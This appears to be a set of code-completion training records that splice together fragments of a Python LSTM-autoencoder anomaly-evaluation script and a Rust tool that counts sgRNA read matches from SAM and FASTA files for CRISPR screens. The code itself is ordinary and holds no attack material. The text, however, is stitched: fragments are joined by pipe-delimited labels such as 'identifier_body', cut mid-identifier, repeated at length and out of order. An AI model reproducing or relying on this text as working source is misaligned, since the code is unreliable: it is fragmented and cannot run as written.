criterion = nn.L1Loss(reduction='sum').to(device)
bestModel = copy.deepcopy(model.state_dict())
bestLoss = np.inf
# early stop epoch: 10% of max epoch
earlyStopThreshold = self.maxEpoch * 0.1
countWithoutImprovement = 0
for epoch in range(1, self.maxEpoch + 1):
model = model.train()
trainLossList = []
for seqTrue in train:
optimizer.zero_grad()
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
loss.backward()
optimizer.step()
trainLossList.append(loss.item())
validLossList = []
model = model.eval()
with torch.no_grad():
for seqTrue in valid:
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
validLossList.append(loss.item())
MeanOfTrainLoss = np.mean(trainLossList)
MeanOfValidLoss = np.mean(validLossList)
if MeanOfValidLoss < bestLoss:
countWithoutImprovement = 0
bestLoss = MeanOfValidLoss
bestModel = copy.deepcopy(model.state_dict())
else:
countWithoutImprovement += 1
if epoch >= 50 and countWithoutImprovement == earlyStopThreshold:
print('Early stopping!')
break
print(f'Epoch {epoch}: train loss {MeanOfTrainLoss} val loss {MeanOfValidLoss}')
model.load_state_dict(bestModel)
# plot result [optional]
fig, axs = plt.subplots(
nrows=2,
ncols=6,
sharex=True,
sharey=True,
figsize=(16, 8)
)
for i, data in enumerate(train[:6]):
self.plotPrediction(data, model, title='Train', ax=axs [0, i])
for i, data in enumerate(valid[:6]):
self.plotPrediction(data, model, title='Valid', ax=axs [1, i])
fig.tight_layout()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_result.png')
plt.close()
return model
def setThreshold(self, autoEncoder, train, valid):
_, trainLosses = self.predict(autoEncoder, train)
_, validLosses = self.predict(autoEncoder, valid)
# plot loss distribution [optional]
sns.distplot(trainLosses, bins=50, kde=True)
sns.distplot(validLosses, bins=50, kde=True)
self.threshold = np.percentile(validLosses, 95)
self.statistics['threshold'] = self.threshold
@staticmethod
def predict(autoEncoder, dataset):
predictions, losses = [], []
criterion = nn.L1Loss(reduction='sum').to(device)
with torch.no_grad():
autoEncoder = autoEncoder.eval()
for seqTrue in dataset:
seqTrue = seqTrue.to(device)
seqPrediction = autoEncoder(seqTrue)
loss = criterion(seqPrediction, seqTrue)
predictions.append(seqPrediction.cpu().numpy().flatten())
losses.append(loss.item())
return predictions, losses
def saveModel(self, autoEncoder):
np.save('./model/' + str(self.paramIndex) + '_ae_statistics', self.statistics)
path = './model/' + str(self.paramIndex) + '_lstm_ae_model.pth'
torch.save(autoEncoder, path)
def loadModel(self):
self.statistics = np.load('./model/' + str(self.paramIndex) + '_ae_statistics.npy', allow_pickle=True).item()
self.threshold = self.statistics['threshold']
autoEncoder = torch.load('./model/' + str(self.paramIndex) + '_lstm_ae_model.pth')
autoEncoder = autoEncoder.to(device)
return autoEncoder
def evaluate(self, autoEncoder):
stable = self.normalData.data.x_data
unstable = self.unstableData.data.x_data
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
stableStarted = len(unstable) - self.windowSize
originWindowSize = self.windowSize
# wait for finding the cycle
cycle, waitTime = None, 0
for i in range(stableStarted):
cycle = self.findCycle(unstable[: i + self.windowSize])
if cycle is None:
continue
else:
waitTime = i + 1
break
if i == stableStarted - 1:
cycle = originWindowSize
originCycle = self.statistics['cycle']
if (cycle / originCycle) > 1:
self.threshold *= (cycle / originCycle)
elif (cycle / originCycle) < 1:
self.threshold *= 1 / (cycle / originCycle)
else:
pass
isWindowChanged = False
for i in range(len(unstable) - self.windowSize - waitTime):
i += waitTime
# sliding window
subSequence = unstable[i: i + self.windowSize]
# re-sampling (normal vs. unstable)
if cycle > originCycle and isWindowChanged is False:
self.windowSize = np.int(np.round(self.windowSize * (cycle / originCycle), 0))
isWindowChanged = True
continue
reSampledSeq = signal.resample(subSequence, np.int(np.round(len(subSequence) * np.float(originCycle / cycle))))
reSampledSeq = reSampledSeq[:originWindowSize]
mean, std = reSampledSeq.mean(), reSampledSeq.std()
# flatten dataset and min-max normalize
reSampledSeq = minMaxScaler.transform(reSampledSeq)
reSampledSeq = reSampledSeq.reshape(-1, originWindowSize)
testDataTensor, _, _ = self.convertToTensor(reSampledSeq)
prediction, loss = self.predict(autoEncoder, testDataTensor)
if loss < self.threshold:
lowerMean, upperMean, upperStd = self.statistics['lowerMean'], self.statistics['upperMean'], \
self.statistics['upperStd']
print(f'Mean lower bound({np.around(lowerMean, 3)}), Mean upper bound('
f'{np.around(upperMean, 3)}) vs. Mean({np.around(mean, 3)})')
print(f'Std upper bound({np.around(upperStd, 3)}) vs. Std({np.around(std, 3)})')
print(f'threshold({np.around(self.threshold, 2)}) vs. loss({np.around(loss[0], 2)})')
print(f'original cycle({np.around(originCycle, 1)}) vs. new cycle({np.around(cycle, 2)})')
# if lowerMean <= mean.item() <= upperMean and std.item() <= upperStd:
# self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
# stableStarted = i
# break
self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
stableStarted = i
break
self.printResult(self.normalData.data.x_data, unstable[i: i + self.windowSize], stableStarted)
# @staticmethod
def plotFigu | re(self, t | identifier_name | |
AutoEncoderBasedEvaluation.py | trainData = trainData[: -trainDataMissing]
if validationDataMissing != 0:
validationData = validationData[: -validationDataMissing]
# plot dataset [optional]
print("data shape:", trainData.shape, validationData.shape)
plt.plot(trainData, label="train")
plt.plot(validationData, label="validate")
plt.legend()
# plt.show()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_valid_data.png')
plt.close()
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize) # 12(window)
validationData = validationData.reshape(-1, self.windowSize)
print("data shape:", trainData.shape, validationData.shape)
# collect mean, std
meanOfTrainData, stdOfTrainData = self.collectMeanStd(trainData)
meanOfValidationData, stdOfValidationData = self.collectMeanStd(validationData)
meanOfTrainData += meanOfValidationData
stdOfTrainData += stdOfValidationData
# find cycle of repeated trend
cycle = self.findCycle(stable)
# save statistic values [left tail, right tail, right tail(std), cycle]
self.statistics = {'lowerMean': np.percentile(meanOfTrainData, 5),
'upperMean': np.percentile(meanOfTrainData, 95),
'upperStd': np.percentile(stdOfTrainData, 95), 'cycle': cycle}
# flatten dataset and min-max normalize
trainData = minMaxScaler.transform(trainData.reshape(-1, 1))
validationData = minMaxScaler.transform(validationData.reshape(-1, 1))
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize)
validationData = validationData.reshape(-1, self.windowSize)
trainDataTensor, lengthOfSubsequence, numberOfFeatures = self.convertToTensor(trainData)
validationDataTensor, _, _ = self.convertToTensor(validationData)
return trainDataTensor, validationDataTensor, lengthOfSubsequence, numberOfFeatures
@staticmethod
def findCycle(sequence):
normalizedStable = sequence - np.mean(sequence)
# acf = sm.tsa.acf(normalizedStable, nlags=len(normalizedStable), fft=False) # auto correlation
peaks, _ = find_peaks(normalizedStable.to_numpy().flatten())
if peaks.size < 3:
return None
cycle = np.mean(np.diff(peaks))
return cycle
@staticmethod
def convertToTensor(dataset):
dataset = [torch.tensor(s).unsqueeze(1).float() for s in dataset]
# N, windowSize, 1
numberOfSequences, lengthOfSubsequence, numberOfFeatures = torch.stack(dataset).shape
return dataset, lengthOfSubsequence, numberOfFeatures
@staticmethod
def collectMeanStd(dataset):
meanList, stdList = [], []
for seq in dataset:
meanList.append(seq.mean())
stdList.append(seq.std())
return meanList, stdList
def train(self, train, valid, lengthOfSubsequence, numberOfFeatures):
model = LstmAutoEncoder(lengthOfSubsequence, numberOfFeatures, 128) # why 128??? example 이 140이어서?
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=self.learningRate)
criterion = nn.L1Loss(reduction='sum').to(device)
bestModel = copy.deepcopy(model.state_dict())
bestLoss = np.inf
# early stop epoch: 10% of max epoch
earlyStopThreshold = self.maxEpoch * 0.1
countWithoutImprovement = 0
for epoch in range(1, self.maxEpoch + 1):
model = model.train()
trainLossList = []
for seqTrue in train:
optimizer.zero_grad()
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
loss.backward()
optimizer.step()
trainLossList.append(loss.item())
validLossList = []
model = model.eval()
with torch.no_grad():
for seqTrue in valid:
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
validLossList.append(loss.item())
MeanOfTrainLoss = np.mean(trainLossList)
MeanOfValidLoss = np.mean(validLossList)
if MeanOfValidLoss < bestLoss:
countWithoutImprovement = 0
bestLoss = MeanOfValidLoss
bestModel = copy.deepcopy(model.state_dict())
else:
countWithoutImprovement += 1
if epoch >= 50 and countWithoutImprovement == earlyStopThreshold:
print('Early stopping!')
break
print(f'Epoch {epoch}: train loss {MeanOfTrainLoss} val loss {MeanOfValidLoss}')
model.load_state_dict(bestModel)
# plot result [optional]
fig, axs = plt.subplots(
nrows=2,
ncols=6,
sharex=True,
sharey=True,
figsize=(16, 8)
)
for i, data in enumerate(train[:6]):
self.plotPrediction(data, model, title='Train', ax=axs [0, i])
for i, data in enumerate(valid[:6]):
self.plotPrediction(data, model, title='Valid', ax=axs [1, i])
fig.tight_layout()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_result.png')
plt.close()
return model
def setThreshold(self, autoEncoder, train, valid):
_, trainLosses = self.predict(autoEncoder, train)
_, validLosses = self.predict(autoEncoder, valid)
# plot loss distribution [optional]
sns.distplot(trainLosses, bins=50, kde=True)
sns.distplot(validLosses, bins=50, kde=True)
self.threshold = np.percentile(validLosses, 95)
self.statistics['threshold'] = self.threshold
@staticmethod
def predict(autoEncoder, dataset):
predictions, losses = [], []
criterion = nn.L1Loss(reduction='sum').to(device)
with torch.no_grad():
autoEncoder = autoEncoder.eval()
for seqTrue in dataset:
seqTrue = seqTrue.to(device)
seqPrediction = autoEncoder(seqTrue)
loss = criterion(seqPrediction, seqTrue)
predictions.append(seqPrediction.cpu().numpy().flatten())
losses.append(loss.item())
return predictions, losses
def saveModel(self, autoEncoder):
np.save('./model/' + str(self.paramIndex) + '_ae_statistics', self.statistics)
path = './model/' + str(self.paramIndex) + '_lstm_ae_model.pth'
torch.save(autoEncoder, path)
def loadModel(self):
self.statistics = np.load('./model/' + str(self.paramIndex) + '_ae_statistics.npy', allow_pickle=True).item()
self.threshold = self.statistics['threshold']
autoEncoder = torch.load('./model/' + str(self.paramIndex) + '_lstm_ae_model.pth')
autoEncoder = autoEncoder.to(device)
return autoEncoder
def evaluate(self, autoEncoder):
stable = self.normalData.data.x_data
unstable = self.unstableData.data.x_data
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
stableStarted = len(unstable) - self.windowSize
originWindowSize = self.windowSize
# wait for finding the cycle
cycle, waitTime = None, 0
for i in range(stableStarted):
cycle = self.findCycle(unstable[: i + self.windowSize])
if cycle is None:
continue
else:
waitTime = i + 1
break
if i == stableStarted - 1:
cycle = originWindowSize
originCycle = self.statistics['cycle']
if (cycle / originCycle) > 1:
self.threshold *= (cycle / originCycle)
elif (cycle / originCycle) < 1:
self.threshold *= 1 / (cycle / originCycle)
else:
pass
isWindowChanged = False
for i in range(len(unstable) - self.windowSize - waitTime):
i += waitTime
# sliding window
subSequence = unstable[i: i + self.windowSize]
# re-sampling (normal vs. unstable)
if cycle > originCycle and isWindowChanged is False:
self.windowSize = np.int(np.round(self.windowSize * (cycle | print('paramIndex:', self.paramIndex)
stable = self.normalData.data.x_data
# plot distribution [optional]
# sns.distplot(stable, label="train")
# plt.legend()
# plt.show()
# mix max scaler
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
# divide dataset into train set and validation set
trainData, validationData = self.normalData.divideData(stable, self.wantToShuffle)
# remove some data for reshaping
trainDataMissing = trainData.shape[0] % self.windowSize
validationDataMissing = validationData.shape[0] % self.windowSize
if trainDataMissing != 0: | identifier_body | |
main.rs | 32>::new();
let mut ref_libIds = BTreeMap::<String, u32>::new();
let mut targets_matched = BTreeMap::<String, u32>::new();
//let mut geneIds = TreeMap::<String, u32>::new();
// first parse the reference genome from the fasta file
process_fasta(&fasta_file_arg, &fasta_re, geneid_pattern, &mut gene_matches, &mut ref_libIds);
// now parse the samfile
//let (mapped_geneids, count_total) =
let (count_total, count_matched) =
process_sam(&sam_file_arg, mismatch_in_pattern, &mapping_match_pattern, &mut gene_matches, &mut ref_libIds);
let out_base_name = sam_file_arg.replace(".sam", "");
let mut design_out_file =
BufWriter::new(File::create(format!("{}-designs.txt", out_base_name)).expect("problem opening output file"));
design_out_file.write_all(b"sgRNA\tCount\n").unwrap();
// let mut uniqLibIds
for (k, v) in &ref_libIds {
design_out_file.write_all(k.replace("\"", "").as_bytes()).unwrap();
design_out_file.write_all(b"\t").unwrap();
design_out_file.write_all(v.to_string().as_bytes()).unwrap();
design_out_file.write_all(b"\n").unwrap();
if(*v > 0) {
let gid = k.split("_").nth(0).unwrap().to_string();
*targets_matched.entry(gid).or_insert(0) += 1;
}
//println!("{}\t{}", k.replace("\"", ""), v);
}
let mut genes_out_file =
BufWriter::new(File::create(format!("{}-genes.txt", out_base_name)).expect("problem opening output file"));
genes_out_file.write_all(b"Gene\tCount\tdesigns-present\n").unwrap();
for (k, v) in &gene_matches {
genes_out_file.write_all(k.as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(v.to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(targets_matched.get(k).unwrap().to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\n").unwrap();
}
// foreach $target ( sort keys %reads) {
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// write log file
let mut log_file =
BufWriter::new(File::create(format!("{}_log.txt", fasta_file_arg)).expect("problem opening output file"));
log_file.write_all(b"Total\tMatched\n").unwrap();
log_file.write_all(b"\n").unwrap();
log_file.write_all(count_total.to_string().as_bytes()).unwrap();
log_file.write_all(b"\t").unwrap();
log_file.write_all(count_matched.to_string().as_bytes()).unwrap();
log_file.write_all(b"\n").unwrap();
// FIXME: two times "count_total"?
//println!("Total\tMatched");
//println!("{}\t{}", count_total, count_total);
}
fn parse_args(fasta_file_arg: &mut String,
sam_file_arg: &mut String,
mapping_match_pattern: &mut String,
geneid_pattern: &mut String,
logfile_out: &mut String) {
// put the argparsing in its own scope
let mut cli_parser = ArgumentParser::new();
cli_parser.set_description("mapper for CRISPRanalyzer");
cli_parser.refer(fasta_file_arg)
.add_option(&["-f", "--fasta-file"], Store, "Fasta Library Input File")
.required();
cli_parser.refer(sam_file_arg)
.add_option(&["-s", "--sam-file"], Store, "Sam Input file")
.required();
cli_parser.refer(mapping_match_pattern)
.add_option(&["-m", "--match-pattern"], Store, "Mapping match pattern e.g. M{20,21}$");
cli_parser.refer(geneid_pattern)
.add_option(&["-g", "--geneid-pattern"], Store, "GeneId pattern to parse, e.g. '_'");
cli_parser.refer(logfile_out).add_option(&["-l", "--logfile"], Store, "Logfile filename");
cli_parser.parse_args_or_exit();
}
fn process_fasta(fasta_file: &str, fasta_re: &Regex, geneid_pattern : String, gene_matches : &mut BTreeMap<String, u32>, ref_libIds: &mut BTreeMap<String, u32>) {
let fasta_file = BufReader::new(File::open(fasta_file).expect("Problem opening fastq file"));
for line in fasta_file.lines() {
let ln = line.expect("programmer error in reading fasta line by line");
ref_libIds.extend(
fasta_re.captures_iter(&ln)
// iterate over all Matches, which may have multiple capture groups each
.map(|captures: regex::Captures| {
let key = captures.get(1) // of this match, take the first capture group
.expect("fasta regex match should have had first capture group")
.as_str().to_owned(); // make Owned copy of capture-group contents
// add to gene_matches as well
gene_matches.insert(key.split("_").nth(0).unwrap().to_string(), 0);
(key, 0)
}
)
);
}
}
fn process_sam(sam_file: &str,
mismatch_in_pattern: bool,
mapping_match_pattern: &str,
gene_matches : &mut BTreeMap<String, u32>,
ref_libIds: &mut BTreeMap<String, u32>)
-> (u32,u32) {
//-> (HashMap<String, i32>, u32) {
// our buffer for the sam parser
let sam_file = BufReader::new(File::open(sam_file).expect("Problem opening fastq file"))
.lines();
let sam_mismatch_re =
Regex::new(r"MD:Z:([0-9]+)([A-Z]+)[0-9]+").expect("programmer error in mismatch regex");
let match_string_re = Regex::new(r"([0-9]+)([MIDSH])").expect("programmer error in match regex");
let mapping_match_re =
Regex::new(mapping_match_pattern).expect("programmer error in mapping match regexp");
let mut count_total : u32 = 0;
let mut count_matched : u32 = 0;
for l in sam_file {
let next_line = l.expect("io-error reading from samfile");
// fast forward the sam header to the beginning of the
// alignment section - skip the header starting with @
if next_line.starts_with('@') {
continue;
}
// ----------the basic algorithm starts here ---
// now split
let al_arr: Vec<&str> = next_line.trim_right().split("\t").collect();
//only count the mapped read if 2nd field, the FLAG, indicates an alignment that is neither rev-complementary, nor unmapped, nor a mutliple alignment (FLAG = 0)
if(al_arr[1] != "0") {
continue;
}
count_total += 1;
//println!("{}", al_arr[2]);
//let gene_id = al_arr[2].split("_").nth(0).unwrap();
let mut found_mismatch = false;
// the sam file format is so BAD that a certain position of any optional field cannot be
// predicted for sure, so we need to parse the whole line for the mismatch string
// at least we know that we have to search from the right end to the left because in the
// beginning we have mandantory fields (first 11)
let mut mm_positions: Vec<usize> = Vec::new();
for caps in sam_mismatch_re.captures_iter(&next_line) {
let mm_pos: i32 = caps[1].parse().expect("programmer error: cannot parse string to number for iterating");
mm_positions.push(mm_pos as usize);
found_mismatch = true;
}
// do some prechecks to save computation time...skip the obvious
let skip = !mismatch_in_pattern && found_mismatch || mismatch_in_pattern && !found_mismatch;
if !skip {
// build / expand cigar string, e.g. 20M -> MMMMMMMMMMMMMMMMMMMM, 10M,1I,5D ->
// MMMMMMMMMMIDDDDD, 20M1D =
let mut match_string = String::new();
for caps in match_string_re.captures_iter(&al_arr[5]) {
//println!("{}", &caps[1]);
let until_pos: i32 = caps[1].parse().expect("programmer error: cannot convert string to number for iterating");
for _ in 0..until_pos {
match_string.push_str(&caps[2]);
}
}
// now introduce mismatches int the string if needed
if found_mismatch | {
for pos in mm_positions {
// TODO: next line is not compiling
match_string.insert_str(pos, "X");
}
} | conditional_block | |
main.rs | () {
// buffers to hold parsed arguments
let mut fasta_file_arg = String::new();
let mut sam_file_arg = String::new();
let mut mapping_match_pattern = String::from("M{20,21}$");
let mut geneid_pattern = String::from("_");
let mut logfile_out = String::from("./log.out");
// TODO: change argparse to clap as suggested by Jules
parse_args(&mut fasta_file_arg,
&mut sam_file_arg,
&mut mapping_match_pattern,
&mut geneid_pattern,
&mut logfile_out);
//let fasta_re = Regex::new(&format!(r"^>(.+){}", geneid_pattern))
let fasta_re = Regex::new(r"^>(.+)")
.expect("programmer error in accession regex");
let mismatch_in_pattern = mapping_match_pattern.contains('x') ||
mapping_match_pattern.contains('X');
let mut gene_matches = BTreeMap::<String, u32>::new();
let mut ref_libIds = BTreeMap::<String, u32>::new();
let mut targets_matched = BTreeMap::<String, u32>::new();
//let mut geneIds = TreeMap::<String, u32>::new();
// first parse the reference genome from the fasta file
process_fasta(&fasta_file_arg, &fasta_re, geneid_pattern, &mut gene_matches, &mut ref_libIds);
// now parse the samfile
//let (mapped_geneids, count_total) =
let (count_total, count_matched) =
process_sam(&sam_file_arg, mismatch_in_pattern, &mapping_match_pattern, &mut gene_matches, &mut ref_libIds);
let out_base_name = sam_file_arg.replace(".sam", "");
let mut design_out_file =
BufWriter::new(File::create(format!("{}-designs.txt", out_base_name)).expect("problem opening output file"));
design_out_file.write_all(b"sgRNA\tCount\n").unwrap();
// let mut uniqLibIds
for (k, v) in &ref_libIds {
design_out_file.write_all(k.replace("\"", "").as_bytes()).unwrap();
design_out_file.write_all(b"\t").unwrap();
design_out_file.write_all(v.to_string().as_bytes()).unwrap();
design_out_file.write_all(b"\n").unwrap();
if(*v > 0) {
let gid = k.split("_").nth(0).unwrap().to_string();
*targets_matched.entry(gid).or_insert(0) += 1;
}
//println!("{}\t{}", k.replace("\"", ""), v);
}
let mut genes_out_file =
BufWriter::new(File::create(format!("{}-genes.txt", out_base_name)).expect("problem opening output file"));
genes_out_file.write_all(b"Gene\tCount\tdesigns-present\n").unwrap();
for (k, v) in &gene_matches {
genes_out_file.write_all(k.as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(v.to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(targets_matched.get(k).unwrap().to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\n").unwrap();
}
// foreach $target ( sort keys %reads) {
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// write log file
let mut log_file =
BufWriter::new(File::create(format!("{}_log.txt", fasta_file_arg)).expect("problem opening output file"));
log_file.write_all(b"Total\tMatched\n").unwrap();
log_file.write_all(b"\n").unwrap();
log_file.write_all(count_total.to_string().as_bytes()).unwrap();
log_file.write_all(b"\t").unwrap();
log_file.write_all(count_matched.to_string().as_bytes()).unwrap();
log_file.write_all(b"\n").unwrap();
// FIXME: two times "count_total"?
//println!("Total\tMatched");
//println!("{}\t{}", count_total, count_total);
}
fn parse_args(fasta_file_arg: &mut String,
sam_file_arg: &mut String,
mapping_match_pattern: &mut String,
geneid_pattern: &mut String,
logfile_out: &mut String) {
// put the argparsing in its own scope
let mut cli_parser = ArgumentParser::new();
cli_parser.set_description("mapper for CRISPRanalyzer");
cli_parser.refer(fasta_file_arg)
.add_option(&["-f", "--fasta-file"], Store, "Fasta Library Input File")
.required();
cli_parser.refer(sam_file_arg)
.add_option(&["-s", "--sam-file"], Store, "Sam Input file")
.required();
cli_parser.refer(mapping_match_pattern)
.add_option(&["-m", "--match-pattern"], Store, "Mapping match pattern e.g. M{20,21}$");
cli_parser.refer(geneid_pattern)
.add_option(&["-g", "--geneid-pattern"], Store, "GeneId pattern to parse, e.g. '_'");
cli_parser.refer(logfile_out).add_option(&["-l", "--logfile"], Store, "Logfile filename");
cli_parser.parse_args_or_exit();
}
fn process_fasta(fasta_file: &str, fasta_re: &Regex, geneid_pattern : String, gene_matches : &mut BTreeMap<String, u32>, ref_libIds: &mut BTreeMap<String, u32>) {
let fasta_file = BufReader::new(File::open(fasta_file).expect("Problem opening fastq file"));
for line in fasta_file.lines() {
let ln = line.expect("programmer error in reading fasta line by line");
ref_libIds.extend(
fasta_re.captures_iter(&ln)
// iterate over all Matches, which may have multiple capture groups each
.map(|captures: regex::Captures| {
let key = captures.get(1) // of this match, take the first capture group
.expect("fasta regex match should have had first capture group")
.as_str().to_owned(); // make Owned copy of capture-group contents
// add to gene_matches as well
gene_matches.insert(key.split("_").nth(0).unwrap().to_string(), 0);
(key, 0)
}
)
);
}
}
fn process_sam(sam_file: &str,
mismatch_in_pattern: bool,
mapping_match_pattern: &str,
gene_matches : &mut BTreeMap<String, u32>,
ref_libIds: &mut BTreeMap<String, u32>)
-> (u32,u32) | // alignment section - skip the header starting with @
if next_line.starts_with('@') {
continue;
}
// ----------the basic algorithm starts here ---
// now split
let al_arr: Vec<&str> = next_line.trim_right().split("\t").collect();
//only count the mapped read if 2nd field, the FLAG, indicates an alignment that is neither rev-complementary, nor unmapped, nor a mutliple alignment (FLAG = 0)
if(al_arr[1] != "0") {
continue;
}
count_total += 1;
//println!("{}", al_arr[2]);
//let gene_id = al_arr[2].split("_").nth(0).unwrap();
let mut found_mismatch = false;
// the sam file format is so BAD that a certain position of any optional field cannot be
// predicted for sure, so we need to parse the whole line for the mismatch string
// at least we know that we have to search from the right end to the left because in the
// beginning we have mandantory fields (first 11)
let mut mm_positions: Vec<usize> = Vec::new();
for caps in sam_mismatch_re.captures_iter(&next_line) {
let mm_pos: i32 = caps[1].parse().expect("programmer error: cannot parse string to number for iterating");
mm_positions.push(mm_pos as usize);
found_mismatch = true;
}
// do some prechecks to save computation time...skip the obvious
let skip = !mismatch_in_pattern && found | {
//-> (HashMap<String, i32>, u32) {
// our buffer for the sam parser
let sam_file = BufReader::new(File::open(sam_file).expect("Problem opening fastq file"))
.lines();
let sam_mismatch_re =
Regex::new(r"MD:Z:([0-9]+)([A-Z]+)[0-9]+").expect("programmer error in mismatch regex");
let match_string_re = Regex::new(r"([0-9]+)([MIDSH])").expect("programmer error in match regex");
let mapping_match_re =
Regex::new(mapping_match_pattern).expect("programmer error in mapping match regexp");
let mut count_total : u32 = 0;
let mut count_matched : u32 = 0;
for l in sam_file {
let next_line = l.expect("io-error reading from samfile");
// fast forward the sam header to the beginning of the | identifier_body |
main.rs | "");
let mut design_out_file =
BufWriter::new(File::create(format!("{}-designs.txt", out_base_name)).expect("problem opening output file"));
design_out_file.write_all(b"sgRNA\tCount\n").unwrap();
// let mut uniqLibIds
for (k, v) in &ref_libIds {
design_out_file.write_all(k.replace("\"", "").as_bytes()).unwrap();
design_out_file.write_all(b"\t").unwrap();
design_out_file.write_all(v.to_string().as_bytes()).unwrap();
design_out_file.write_all(b"\n").unwrap();
if(*v > 0) {
let gid = k.split("_").nth(0).unwrap().to_string();
*targets_matched.entry(gid).or_insert(0) += 1;
}
//println!("{}\t{}", k.replace("\"", ""), v);
}
let mut genes_out_file =
BufWriter::new(File::create(format!("{}-genes.txt", out_base_name)).expect("problem opening output file"));
genes_out_file.write_all(b"Gene\tCount\tdesigns-present\n").unwrap();
for (k, v) in &gene_matches {
genes_out_file.write_all(k.as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(v.to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(targets_matched.get(k).unwrap().to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\n").unwrap();
}
// foreach $target ( sort keys %reads) {
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// write log file
let mut log_file =
BufWriter::new(File::create(format!("{}_log.txt", fasta_file_arg)).expect("problem opening output file"));
log_file.write_all(b"Total\tMatched\n").unwrap();
log_file.write_all(b"\n").unwrap();
log_file.write_all(count_total.to_string().as_bytes()).unwrap();
log_file.write_all(b"\t").unwrap();
log_file.write_all(count_matched.to_string().as_bytes()).unwrap();
log_file.write_all(b"\n").unwrap();
// FIXME: two times "count_total"?
//println!("Total\tMatched");
//println!("{}\t{}", count_total, count_total);
}
fn parse_args(fasta_file_arg: &mut String,
sam_file_arg: &mut String,
mapping_match_pattern: &mut String,
geneid_pattern: &mut String,
logfile_out: &mut String) {
// put the argparsing in its own scope
let mut cli_parser = ArgumentParser::new();
cli_parser.set_description("mapper for CRISPRanalyzer");
cli_parser.refer(fasta_file_arg)
.add_option(&["-f", "--fasta-file"], Store, "Fasta Library Input File")
.required();
cli_parser.refer(sam_file_arg)
.add_option(&["-s", "--sam-file"], Store, "Sam Input file")
.required();
cli_parser.refer(mapping_match_pattern)
.add_option(&["-m", "--match-pattern"], Store, "Mapping match pattern e.g. M{20,21}$");
cli_parser.refer(geneid_pattern)
.add_option(&["-g", "--geneid-pattern"], Store, "GeneId pattern to parse, e.g. '_'");
cli_parser.refer(logfile_out).add_option(&["-l", "--logfile"], Store, "Logfile filename");
cli_parser.parse_args_or_exit();
}
fn process_fasta(fasta_file: &str, fasta_re: &Regex, geneid_pattern : String, gene_matches : &mut BTreeMap<String, u32>, ref_libIds: &mut BTreeMap<String, u32>) {
let fasta_file = BufReader::new(File::open(fasta_file).expect("Problem opening fastq file"));
for line in fasta_file.lines() {
let ln = line.expect("programmer error in reading fasta line by line");
ref_libIds.extend(
fasta_re.captures_iter(&ln)
// iterate over all Matches, which may have multiple capture groups each
.map(|captures: regex::Captures| {
let key = captures.get(1) // of this match, take the first capture group
.expect("fasta regex match should have had first capture group")
.as_str().to_owned(); // make Owned copy of capture-group contents
// add to gene_matches as well
gene_matches.insert(key.split("_").nth(0).unwrap().to_string(), 0);
(key, 0)
}
)
);
}
}
fn process_sam(sam_file: &str,
mismatch_in_pattern: bool,
mapping_match_pattern: &str,
gene_matches : &mut BTreeMap<String, u32>,
ref_libIds: &mut BTreeMap<String, u32>)
-> (u32,u32) {
//-> (HashMap<String, i32>, u32) {
// our buffer for the sam parser
let sam_file = BufReader::new(File::open(sam_file).expect("Problem opening fastq file"))
.lines();
let sam_mismatch_re =
Regex::new(r"MD:Z:([0-9]+)([A-Z]+)[0-9]+").expect("programmer error in mismatch regex");
let match_string_re = Regex::new(r"([0-9]+)([MIDSH])").expect("programmer error in match regex");
let mapping_match_re =
Regex::new(mapping_match_pattern).expect("programmer error in mapping match regexp");
let mut count_total : u32 = 0;
let mut count_matched : u32 = 0;
for l in sam_file {
let next_line = l.expect("io-error reading from samfile");
// fast forward the sam header to the beginning of the
// alignment section - skip the header starting with @
if next_line.starts_with('@') {
continue;
}
// ----------the basic algorithm starts here ---
// now split
let al_arr: Vec<&str> = next_line.trim_right().split("\t").collect();
//only count the mapped read if 2nd field, the FLAG, indicates an alignment that is neither rev-complementary, nor unmapped, nor a mutliple alignment (FLAG = 0)
if(al_arr[1] != "0") {
continue;
}
count_total += 1;
//println!("{}", al_arr[2]);
//let gene_id = al_arr[2].split("_").nth(0).unwrap();
let mut found_mismatch = false;
// the sam file format is so BAD that a certain position of any optional field cannot be
// predicted for sure, so we need to parse the whole line for the mismatch string
// at least we know that we have to search from the right end to the left because in the
// beginning we have mandantory fields (first 11)
let mut mm_positions: Vec<usize> = Vec::new();
for caps in sam_mismatch_re.captures_iter(&next_line) {
let mm_pos: i32 = caps[1].parse().expect("programmer error: cannot parse string to number for iterating");
mm_positions.push(mm_pos as usize);
found_mismatch = true;
}
// do some prechecks to save computation time...skip the obvious
